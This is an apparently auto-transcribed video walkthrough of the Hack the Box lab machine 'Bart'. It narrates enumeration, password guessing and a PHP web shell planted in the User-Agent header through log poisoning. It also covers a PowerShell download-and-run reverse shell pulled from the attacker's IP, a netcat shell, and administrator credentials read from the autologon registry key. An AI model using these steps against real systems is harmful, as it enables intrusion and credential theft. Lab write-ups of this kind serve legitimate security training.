and today's video will be about BART. BART is a beginner to medium machine created by the Hack the Box and was included as part of Pawn with Metasploit. Although I didn't solve the machine with Metasploit, so basically I have no idea why they put this machine here in this track. So basically, guys, if you have other ideas or other reasons, you can just put them down in the comments of this video. And in the upcoming video, we're going to do the last video of this track, which is real. Okay, so let's jump now to BART, spawn the machine, making sure we are connected, and we start off with the nmap scan. Nmap scan shows we have one open port, which is 80. And on port 80, we have Microsoft Internet Information Service running, version 10. So this means that the machine, or the target machine, is Microsoft Windows Server. It could be Windows Server 2008. As you can see, there are speculations here about the version. We can run our analysis later about the version, but for now, we only need the port, right? And there is a little note here that says the title. As you can see, there was a redirect to forum.bar.htp. So due to DNS resolution, I added here the entries to the host file. So cat etc hosts. Make sure you add. Okay, so make sure you add BART forum.bart monitor.bart internal 01.bart. Now for these two, they will come later. Okay, you will find out about them later. But for BART, you can add it from now, and you can add BART forum.bart.http based on the notes we found through the nmap scan. Okay, so once we browse to the portal here, let's browse to the portal one more time. Okay, as you can see, I got redirected to forum.bart, and since I have added this to the host file, the page was displayed with no problems. Okay, now we start the enumeration like we usually do. So we navigate through the various sections of the website, and as you can see, we have team members. We have names: Samantha Brown, Daniel Simon, and Robert Hilton. Also, if we scroll down, we have Jane, but Jane is a client. It cannot be used as a member of the company. And that's it. And we have here also another email, info@bart. So, and lastly, it says that the website was proudly powered by WordPress. So this is a WordPress website, and you may be thinking about jumping directly to WP scan. So let's try WP admin. And as you can see, we have an error. The page cannot be displayed because an internal server error has occurred. So it might be that the WP admin is hidden, and that can happen in real life scenarios. But for such challenge, although it writes that it is powered by WordPress, but it is not, as you will see later. So, like you always do, let's now explore the source of the page. Right-click, view page source, and that's the page source. Now, if you scroll the way down, if you have the patience to scroll the way down, you will see here an interesting section. So, right in the Teams section, there is an email revealed here. As you can see, Harvey Potter, and he is a developer at this portal, and that's his email address. Okay, now h.potter, that's the formula followed by the company to create the email addresses, which means that the other members we have just discovered, Samantha Brown, Daniel Simons, Robert Hilton, most likely they follow the same email formula, which means the first letter of the first name, dot, and then we have the last name. So Samantha Brown, her email goes by s.brown@bart, d.simons@bart, r.hilton hilton@bart, okay, .htp. So right now we have got a list of usernames, right? We can put this list of these usernames in a list, okay, and save it for later. For now, we have gathered some information, including the usernames. Now, what we need to do here, we need to understand or find out the website infrastructure. What is the platform used to create the website? If you go back to the page source, as you can see, we got it from the footer that it is created by WordPress, yet we couldn't access the WP admin for some reason. It was displaying WP, it was displaying internal error. So for now, we cannot make use of this fact that the website is made by WordPress. So we will jump to directory brute force. So in directory brute force, I have saved the time on you guys, and that's the command I used. So wfuzz, okay, -c for colored outputs, -w for the word list that I used, and here the domain. And of course slash, I put the word fuzz or the keyword fuzz to indicate that I want wfuzz to use the keywords or the word lists from here and put them after the slash, indicating that I want to brute force directories. As you can see, I got many responses with same characters or word length. As you can see, word count, character count. So what I did, I filtered these lengths. So again, the same command, but this time I used the character filter and filtered all the responses, which include 150,693 characters. And it was revealed, yeah, as you can see, wait. So here I got some error in the commands. If you scroll down, so --HH, yeah, scrolling down, as you can see here, I got some useful responses, including forum and monitor. Okay, so if we go now to bart.htp/monitor, that's the new directory we discovered, apart from the forum. Okay, as you can see, it redirects you to a login form. Now, what about forum? And it's the same page. So bar.htp/forum is the same as, or displays the same page as forum.bar.htp. So for now, we're going to close this one. Okay. And now we have a new item to work with, this directory. Now this directory displays the same page if we try to navigate to the subdomain. As you can see, it's the same page. So let's work with one of them. I chose to work with the subdomain, so I closed this one, and that's the login form. Okay, so far we have enumerated the web page, gathered some usernames or emails, and we unveiled hidden directories. Now the next step is, as you can see, we have a login form. Now when we encounter login forms, we can try SQL injection. I'm giving you some options that you can go with in any typical scenario. So we can try SQL injection. We can try actually to brute force the password using Hydra or Perp Suite, or in this scenario, it was a bit different. If we click on forgot password, and here you put in the username. Now, if you remember, we have unveiled the usernames here through our team, and in addition to the Harvey Potter, the developer username. So if we try here to forget the password, send the password to, say, Samantha Brown, so s.brown@bar.htp. Submit. As you can see, the profile username couldn't be found, so we have to work with the username. What we just used was the email address. So if we try only with s.brown, That could be the username. Well, it is not. Now, maybe we can try with only the first name as the username. And it couldn't be found. What if we try for the username we discovered in the page source, Harvey.Potter. Okay, what if we try with H.Potter? Alright, what if we try with only Harvey, the first name as the username? And as you can see, an email has been sent to you with information to reset your password. Now, why this is useful for us? We just discovered usernames, right? So this means that Harvey, Samantha, Daniel, it means that the first name of all the users, all the team members, is actually the username used to log into the site. So the next step is to guess the password. Now, to guess the password, there is a problem here. Not a problem, there is some difficulties. So if we try to, before we try to brute force any login form using Hydra or any other tool, first we have to find out what is the response looks like when you first try to log in. So if we use Perp Suite here, turn on the intercept, go to intercept here. Let's make sure the configurations are correct, because I have deleted the tool Foxy proxy, so I have to do it manually this time. Okay. Forward. Let's not forward this one. Okay, test, login. Yeah, so if we forward, now as you can see here, we have a CSRF token with the along with the username and the password we have just typed. So the existence of the CSRF token, it means we have to use some sort of a brute force script that takes into account the randomness of the CSRF token, which it changes every time with the request. So if you have a CSRF token that changes every time, you cannot do simple brute force with a word list consisting of usernames and passwords. You have to build a script that takes into account the changing CSRF. So the developer of the challenge, they knew beforehand, and not all of the people who are doing the CTF can actually develop the script. So that's why the password for the username Harvey is actually simple and can be guessed easily, which is Potter, the surname of the surname of the user. So if you try to log in with Potter, it will work. As you can see, we are logged in now to the server monitor. So we're going to close this page and work with this page. So we have logged in now. If you click on internal chat, we get another domain. And I mentioned this domain at the very beginning of the video. So what you can do, you just have to add the internal 01 BART and browse to it. So if you browse to internal BART here, let me log out, because that's not how it looks like. So that's what you get if you browse to this domain. So it's a page that directs us to simplechat/login_form.php. And here we have a username and password to fill in order to log in. Of course, we can try the same method. So if we say Harvey here and intercept request with a test password, forward, the password must be at least 8 characters. So maybe you can try here some sort of brute force let's take a look at the request. So here we do not have a CSRF token. So chances are, if you try to build a word list of the current usernames and the current passwords, you'll be able to log in or maybe guess the password. But what if not? What if we used brute force and it didn't work? Simply for the fact that we don't know who are the users on this portal. Yeah, the users can be the same users we found earlier here, but in fact, if you try to list these usernames in a list along with some passwords and try to brute force the form here, it's not going to work. So there must be a user here or some mechanism we can actually follow instead of brute forcing the form to log in. Also, SQL injection did not work. So what should we do here? If we go to page source, okay, again, we try to take clues from the page source. There is nothing, but if you click on, as you can see, the CSS, it will reveal the author of this application. If you Google the author, if you go back and type simple chat, okay, let's see this one. Okay, so this is the application here that we are dealing with. Simple chat form. And as you can see, we have SQL, which means there is a chance that there might be an SQL vulnerability here, but it's not. Simple chat. Okay, this is the source code of this application. As you can see, we have a page, register. And if you take a look at the code, we can register and log in if we are able to provide uname as parameter in a post request and password. So if we provide these two parameters in a post request, we'll be able to register with the said parameters at the website and login according to the source code. So the next step now, we have to do some post request to the website with the provided parameters we have just discovered in the source code. So let's go back. You can do the post request with Burp Suite, but instead I'm going to do it with curl. So curl -x post, and let's go back and copy that. -t, provide the parameters uname equal, let's say, my name, and let's go back and find the password parameter. So it is password. Alright, now this means since we haven't received any error in the output, it means that the credentials or the username has been registered. So we go back and try to log in with this username. The password must be at least 8 characters. Okay, 1, 2, 3, 4, 5. And we are logged in. So a simple Googling, as you can see, revealed the mechanism based on which the application works. We took advantage of that and we registered with the username and password. Now, this all sounds kind of CTF-ish, right? So I'm not sure if you are following with that. So here we have the chat portal, right? If we try to add something, say hi, and click on enter, as you can see, it logged my greetings. And we have refresh. Okay, and we have log. If you click on log, as you can see, it says done. And then we have one, which is kind of, yeah, the done is understandable, but one, I'm not sure I got this. So if we turn on this one more time and I click on log, take a look at this. So when we click on log, this request is made to log/log. There's a PHP file that handles the logs. This PHP file writes the attempt we just made right here, okay? It writes that attempt to a file, text file called log, and using the username Harvey. Okay, if we forward this one, done, forward. Okay, now other requests are not important. So we got some clues of how it works. So basically here there is a log file that's handling all of the actual attempts made on this button. So when we log this, we want to see what happens. Okay, so let's try to take a look at the contents of the log file that we just revealed in the purpose suite. So basically, if we try to go to log/log text, let me turn this off. It's off. Yeah, as you can see here, we have all of the logs of the attempts we made on this button. So as you can see, we have the date. It starts with the date, the username, and the user agent. Again, the date, the username, and user agent. Date, username, and user agent. So we have 3 attempts or 3 clicks on this button, right? So basically, that's how it works. So this means that the log file here is writable. Writable by what file? The log.php we saw earlier. Okay, now when we deal with log files that are able to write to text files, what we want to do, we want to try and see if one of these fields, the date or the username or the user agent, can be executed. So instead of rendering the text here, we render a command. That's what is called the log file poisoning. So this is a log file. When we want to poison the log file, we try to just manipulate one of the fields displayed here and make the application executed instead of writing it in plain text. So to do that, we can go back to Purpose Suite on and try with the fields. So log. Okay, what we can do here, I'm not going to play with the file name. Let's see the file name as is. Let's try with the username. Okay, so basically if we type who am I forward, done, and we got 0 here. So let's see what does that mean. If you go back, just memorize that we have 3 entries here. Okay, if we refresh the page, as you can see, we don't see an entry for the 4th attempt we made here. It hasn't been logged. That's the explanation of 0 we saw earlier, which means we cannot play with the username field. It must stay as Harvey, and I expect the date to be the same. We cannot play with the date as well. So the prominent option, it's only common and known that if we play with the user agent, we might have a chance. So most of the time, log file poisoning happens through the user agent by playing with the user agent. So let's see what we can do with the user agent. Maybe we can try to write some command, right, and see if the command is executed. So let's go back, turn this on, log. Alright, so that's the user agent. Okay, let's write a simple shell here using PHP. PHP system get, and we select a parameter. Let's say it is CMD. Alright, semicolon, and we close the PHP. Right, so forward, everything is off, done, and we got 1, which means there is another entry that has been added to the log file. If we are lucky, the user agent here will execute, will be able to use CMD to execute further commands. Okay, so to get this to work, before we try to execute commands through this PHP shell, we want the original log file, log.php, to displace first maybe the PHP information. And in the response, as you can see, we got the PHP configuration of the website. So which means now we will be able to inject the PHP shell we witnessed earlier here, okay, and execute system commands. The commands are supposed to appear down here. So what are we going to do here? We're going to say and cmd equal who am I, okay, all you have to do here, guys, is to change the user agent payload. It's going to be this one, cmd equal who am I. Forward. Okay, and as you can see here, net authority user, iUser, which means the who am I has been executed and the log file has successfully been poisoned. The next step now, as you know, we grab a reverse shell. Since this is a Windows operating system, specifically Windows Server, we're going to need a PowerShell reverse shell. So better than Nishang PowerShell. So ls cd, let me see if I have it, cd shells, yeah, cd Nishang, cd shells one more time. So what we want from here? We want the invoke PowerShell TCP. Here it is. Let's take a copy of this. Okay, TCP into home. Okay, so cd now. That's it. We're going to open this, and at the very end we're going to add the listener information. So first let's find out my IP address. So 10.10.14.19, and assuming that we will use port 4545, let's go back. Okay, invoke so IP address information 10.10.14.19. and the port would be 4545. Alright, so now we're going to need to host this in my web server. So let's change the name. Maybe, yeah, let's keep the name as is. Okay, so python -3m v.server, and now the reverse shell is ready to be served. So what are we going to do now? We're going to use, let me go back, yeah, we're going to use the cmd parameter here to download the reverse shell from my machine. Okay, so go back. Hopefully this will work without any hassles. So log, okay, let's grab this first. Alright, change this one and the cmd here, and okay, so here we go. We write the cmd. Now since the target OS is Windows Server, we're going to write the command that's supposed to be executed by the OS, which happens to be Windows. So it needs to be PowerShell to download the reverse shell. So PowerShell plus / space -ep to script bypass plus space, and then another space using plus -c, another space, oops, the plus, okay, -c, and then we have to write the rest of that. So basically we also need another plus for the space, and then we start the command iex to download the exploit. So new object, oops, this is writing in all, okay. Next we need another space using the plus sign, and then net web client dot download script string. Okay, so here we need to put the URL of my server. So here HTTP, my IP address was, oops, this one cannot be, we need to escape the colon. So to encode it in the URL format, we're going to use %3a to indicate that we encoded the colon into URL encoded format. Now here 10, 10, 14, 19, I remember. Let's make sure this is correct. Yes, it is correct. So let me go back. I think I have to change the name of my shell for simplicity. So move invoke into shell ps1. Again, we have to escape this. The port is 8000. Exactly. So let's copy that. It's a good idea to copy that because it might not work from the first attempt. So let me copy it somewhere here. And let's see, examine this one more time. All right, forward. I think I have a mistake, guys. So the mistake is the shell here, the path should be after the 8000. So if we try this now, okay, turn this on. Yeah, we forgot something as well. The listener RL wrap. Shall we use RL wrap or shall we use netcuts? Okay, auto-wrap is better. Dash nc dash lvp 4545. I mean, okay. Figured out I don't have auto-wrap. It's the worst time to install it. Sudo rl wrap nc.lvp 4545. Okay, so forward and again forward. As you can see, the shell has been retrieved and has been executed as well. So right now we got the first foothold. So that was the mistake, guys. Just the shell directory should come after the port, not before the port. So right now the next step is to escalate the privileges. And in this machine there are many ways to escalate the privileges. So basically what we can do, you can transfer WinPiece to this machine, run WinPiece, and you will find out that there is a vulnerability on this machine called the auto-logon, which means that the administrator credentials are stored in plaintext or as plaintext. So as you can see, when I run the command, it threw an error. This is because this machine is 32-bit and this command only works on 64-bit machines. So what we can do, we can transfer netcat 64 and launch it on this machine. Before doing that, let's navigate to or find out the privileges that we got. UMI/priv. So we have impersonate privilege enabled on this machine, which means we can use a juicy potato exploit. But I'm not going to take this path because this exploit has been used a lot and there are many videos on YouTube about this. And also I have done like 2 to 3 videos about juicy potato, so I'm not going to take this path for this video. There is another path for this video, which is actually exploiting the fact that this machine has auto-logon enabled. Now, if you ask me how did you find out, you can just transfer WinPiece, guys, to the machine. WinPiece will enumerate for all the possible privilege escalation vectors. It will tell you that the administrator password can be found in the registry because the auto-logon is enabled. So basically that's what we can do. Now I'm going to skip directly to the privilege escalation method. So to do that, as you can see here, when I try to inquire the default password, the username in WinLogon, I got this error because I have to use a listener that's 64-bit, not 32-bit. So what I can do here, I can go back to my machine and grab this netcat, maybe from the internet, nc64 github. Yeah, here it is. Sudo git clone and we have this 64 netcat 64. Okay, Python. We have to cancel this instance, go back here and launch this one instead. So right now we can retrieve netcat from my machine we go back to the shell we have and we use PowerShell dash URI. Here there is no need to URL encode 10, 10, 14, 19, 8000 and 64 exe dash out file and 64.txt. Let's see if we can write to this directory here, log, and as you can see it has been retrieved. Now sudo rl wrap nc lvp 4546 this time, and now we can launch netcat from here, nc64.exe, and we connect to my machine -e. We want PowerShell to be launched after we connect, so we type PowerShell and the IP address information of my machine 4546, and as you can see now we received the shell on other ports. So that's simply what I did. I just transferred netcat 64 to the machine to be able to retrieve the default admin credentials by inquiring the relevant registry key of the auto-logon. That's the command. Again, we have an error. So what's the problem? File stream was asked to open a device that wasn't a file. What about we inquire only this? Yes, and as you can see guys, there is a unique entry here, the last used username and the default password. So administrator, and that's the password. Now this is not the hash, this is the password. Now what we can do here, to be able to use the password and escalate to admin, we can use run as, or we can use netuse, or we can use psexec from inpacket to connect with this password. Okay, so let's use the run as method, which means we have to define a couple parameters here before we proceed. So username equal part we first define the username, okay, and then the password. This is the password. Okay, and then we create a secure version of the password, secure string, let's say, new object dash type name system string. All right, and then we pass the password variable we created to what's going on. Okay, array for, I'm just copying these guys from my notes. Again, you can find the notes in the channel membership, and then we pass in the secure string we created. Alright, the last thing is we create new credentials, new object dash type name system management automation ps credential argument list. So in the argument list here, we provide the username and the secure string, not the password. So the username and the secure string. A problem, as always. Type name. Yeah, we have an issue here in the type name. Type name. We fix this. Okay then. Alright, so then the last thing we do, guys, is to again download the Nishank PowerShell. This time I'm going to modify Nishank PowerShell, copy another version of this one, lscp shell shell 1 ps1, and we're going to change the port. What I'm going to do, I'm going to use the credentials I created, okay, and run a request, use PowerShell to request the new shell. When I do that, the session will come as administrator. So sudo rl-wrap nc-ltp 4547. So we leave this running and we run python 3-n http.server. What's going on here? Yeah, dot. So this is the server, this is the listener. Let's close this one. And here we have to, all we have to do is to send the request. So invoke command dash script block. And to launch a script block, we have to use the curly braces, IEX, as we did earlier, new object net web client download string. Okay, and here we put in the URL, which is the IP address of my machine, shell1.ps1. Now what else do we have? Okay, we have to enclose this one first with the single quote and the parentheses, and lastly the curly brace we have created. Okay, then this command, I'm gonna invoke this command, but then we will have to pass the credentials we created earlier to execute this command as administrator. So dash credential. The credentials are the cred variable, and that then we put into computer the local host, should be local host, and that's it. So the credentials include the username and the secure string. As you can see, it has been retrieved from my server, and I received another shell here as administrator. So cdback ls cd desktop, and that's the root flag. So that's it, guys. Let me go over again what we did. So we discovered these subdomains and the directories, and we took advantage of the fact that the usernames are revealed, including the username of the developer, Harvey Potter. We use Harvey Potter in the login portal, which was here, yeah, so to retrieve the password. So basically what we did forgot password, and we discovered that the username goes by the first name of Harvey Potter, which is Harvey, and the password was simple Potter Through that, we logged into the server monitor. We discovered another subdomain, internal01, which took us to another login form. Now this login form, we were able to trace back the source code, and using the source code, we were able to register a test account using my name. The test account, through playing with the page here, we were able to reveal that it is logging. There's a functionality here with the button log to log all of the chats, all of the attempts we made to a log file that's handled by a PHP file. So basically, as you can see, the log file, if you play the user with the user agent, it will take the input you actually supplied and log it to the text file. So we knew that the PHP file can write to the log file, and the user agent can be modified. So we tried log poisoning with the user agent. Instead of the user agent, we supplied this PHP shell, and we supplied the command to download the Nishank PowerShell, and that's what we got the first session. So assumingly, after you transfer the one piece, you'll be able to find all the privilege escalation vectors. We saw that we can use juicy potato because there is impersonate privilege enabled here, but we chose not to do this path because it's very common and very available on the internet. Now we chose to do the easy path, which is actually exploiting the fact that there is auto-logon enabled. So what we did, we transferred 64-bit version of netcut to have a more stable shell, and we were able to reveal the administrator password by, as you can see, querying the relevant registry key, and this is the administrator password. Using run as method, we stored the credentials, the username, and we turned the password here into a secret password, and lastly we stored all of that in a credential variable. We used that variable, as you can see here, to run a command to download another Nishank shell from my server, and it came as administrator. So that's how it worked. I hope you like that, guys. And if you want to, all of these comments I took them from my notes. You'll be able to find the notes in the Google Drive of the channel membership tier 2. So thank you for watching.